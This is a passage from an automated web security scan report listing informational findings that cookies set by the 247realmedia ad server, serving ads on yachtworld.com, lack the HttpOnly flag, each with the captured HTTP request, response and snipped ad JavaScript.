Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkmU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2244
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...

4.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/boatsearch.html/1268659347@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/boatsearch.html/1268659347@Top1,Right1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/boatsearch.html/1268659347@Top1,Right1? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQsU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4871
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<SCRIPT type="text/javascript"> \n');
document.write ('var TFSMFlash_PRETAG="";\n');
document.write ('var TFSMFlash_POSTTAG="
...[SNIP]...

4.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1106895876@Right1,Position2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1106895876@Right1,Position2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1106895876@Right1,Position2? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQCU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:31:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 5376
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Position2') {
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/javascript"
...[SNIP]...

4.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1707366322@Right1,Position2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1707366322@Right1,Position2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1707366322@Right1,Position2? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:18:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4891
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Position2') {
document.write ('<SCRIPT type="text/javascript"> \n');
document.write ('var TFSMFlash_PRETAG="";\n');
document.write ('var TFSMFlash_POSTTA
...[SNIP]...

4.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXO0U10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:32 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXa4U10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1487
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/79219577
...[SNIP]...

4.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1?&man=REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2005&maxyr=2005&minpr=112995&maxpr=112995&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXO7U10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXa8U10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1493
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/18237275
...[SNIP]...

4.16. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2007&maxyr=2007&minpr=119900&maxpr=119900&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNyU10erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZxU10erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1489
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/71646150
...[SNIP]...

4.17. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1?&man=32REGULATOR&type=used&cl=PowerCenterConsole&cl=PowerSaltwaterFishing&minyr=2006&maxyr=2006&minpr=108000&maxpr=108000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXNAU10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:21 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZtU10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1449
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/67785241
...[SNIP]...

4.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1?&man=REGULATOR&type=used&cl=PowerSportFishing&cl=PowerSaltwaterFishing&cl=PowerCenterConsole&minyr=2006&maxyr=2006&minpr=119000&maxpr=119000&minl=32&maxl=32&hull=Fiberglass&fuel=GasPetrol HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOJU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXaFU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1527
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/20266264
...[SNIP]...

4.19. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXOCU20erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZZU20erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1289
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/130226
...[SNIP]...

4.20. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1573214004@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1573214004@Top1,Right1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1573214004@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:31:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2944
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/945539
...[SNIP]...

4.21. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXQsU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZoU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2966
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/168580
...[SNIP]...

4.22. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1?&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32 HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cint=100&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=0&sm=3&enid=0&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=0&man=regulator&slim=quick&is=false&No=10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; RMFS=011PiXRZU30erBjd|U10esfwB

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:32:18 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXZqU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1275
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/161696
...[SNIP]...

4.23. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
